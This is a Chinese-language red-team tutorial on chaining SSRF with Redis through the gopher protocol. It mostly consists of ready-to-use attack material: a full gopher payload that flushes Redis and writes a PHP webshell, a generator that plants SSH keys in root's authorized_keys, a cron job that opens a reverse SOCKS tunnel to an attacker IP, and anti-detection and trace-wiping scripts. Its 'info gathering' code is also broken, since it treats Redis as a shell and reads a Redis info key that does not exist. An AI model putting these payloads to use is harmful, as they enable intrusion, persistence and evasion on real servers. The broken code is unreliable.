别再只测SSRF读文件了!用BurpSuite+Redis打造你的内网横向移动跳板
从SSRF到内网渗透:Redis协议在红队实战中的高阶应用
当大多数安全工程师还在用SSRF漏洞读取本地文件时,真正的红队选手已经将目光投向了更具战略价值的目标——通过Redis服务构建内网横向移动的跳板。本文将揭示如何将传统的SSRF漏洞利用升级为自动化内网渗透武器,重点分享BurpSuite与Redis协议的组合技实战经验。
1. Redis协议:被低估的内网渗透通道
Redis的未授权访问漏洞早已不是新鲜话题,但结合SSRF漏洞使用时,其危险性往往被严重低估。与简单的文件读取不同,通过Redis协议可以实现:
- 系统级控制:当Redis以root权限运行时,可通过写入SSH公钥直接获取服务器权限
- 持久化后门:利用Redis的持久化机制在Web目录写入webshell
- 定时任务植入:通过crontab实现反弹shell的自动化维持
- 内网代理节点:将沦陷的Redis服务器转化为SOCKS代理进行内网横向移动
关键协议对比:
| 协议类型 | 请求复杂度 | 回显可见性 | 攻击面广度 |
|---|---|---|---|
| dict | 低 | 高 | 有限 |
| gopher | 高 | 无 | 广泛 |
| http | 中 | 中 | 中等 |
实战提示:gopher协议虽然构造复杂,但能完整模拟TCP交互,是攻击Redis的最强武器
2. 自动化攻击工具链构建
手工构造gopher payload效率低下,真正的红队行动需要自动化工具支持。以下是基于BurpSuite的实战工作流:
2.1 Intruder模块的深度配置
- 配置攻击模板:
GET /vuln.php?url=gopher://{内网IP}:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2410%0D%0A%0A%0A%3C?php%20system($_GET[cmd])%3B?%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A HTTP/1.1 Host: target.com- 设置IP变量范围:
# 生成C段扫描IP列表 for i in range(1,255): print(f"192.168.1.{i}")- 使用Pitchfork攻击类型,配合Null payloads处理固定参数
2.2 Python辅助脚本开发
自动化生成gopher payload的Python实现:
import urllib.parse def generate_redis_payload(command): protocol = "" for c in command.split('\n'): if not c: continue parts = c.split(' ') protocol += f"*{len(parts)}\r\n" for p in parts: protocol += f"${len(p)}\r\n{p}\r\n" return "gopher://127.0.0.1:6379/_" + urllib.parse.quote(protocol) # 示例:写入SSH公钥 cmd = """ flushall set margin "\n\nssh-rsa AAAAB3...== user@kali\n\n" config set dir /root/.ssh config set dbfilename authorized_keys save """ print(generate_redis_payload(cmd))3. 内网横向移动的战术演进
获得Redis控制权只是开始,真正的价值在于如何将其转化为持久化据点:
3.1 建立SOCKS代理隧道
- 在沦陷服务器部署代理工具:
# 使用EarthWorm建立反向代理 ./ew -s rcsocks -l 1080 -e 8888- 配置Redis定时任务维持代理:
crontab_payload = """ set x "\n\n* * * * * /tmp/.ew/ew -s rssocks -d 攻击IP -e 8888\n\n" config set dir /var/spool/cron config set dbfilename root save """3.2 自动化信息收集框架
整合Redis命令与内网扫描:
import redis def redis_info_gathering(r): print("[+] Redis版本:", r.info()['redis_version']) print("[+] 配置信息:", r.config_get()) print("[+] 密钥列表:", r.keys('*')) # 自动识别Web目录 if 'WEB_ROOT' in r.info(): web_path = r.info()['WEB_ROOT'] else: web_path = '/var/www/html' return { 'users': r.command('cat /etc/passwd'), 'network': r.command('ifconfig'), 'web_path': web_path }4. 防御对抗与痕迹清理
高水平的攻击必须包含反检测策略:
对抗检测的关键点:
- 使用Redis的
SCRIPT FLUSH清除执行痕迹 - 避免频繁的
CONFIG SET操作触发告警 - 将恶意命令拆分为多个合法命令混合执行
- 利用Redis主从复制机制实现持久化
清理脚本示例:
#!/bin/bash # 清除Redis攻击痕迹 redis-cli flushall redis-cli config set dir /tmp redis-cli config set dbfilename temp.rdb redis-cli save rm -f /var/spool/cron/root sed -i '/ew/d' /etc/crontab在真实的红队评估中,我们曾通过这套方法在30分钟内横向移动跨越了5个网络区域。关键在于将每个Redis节点视为战略据点而非简单目标,通过自动化工具链实现攻击规模的指数级扩张。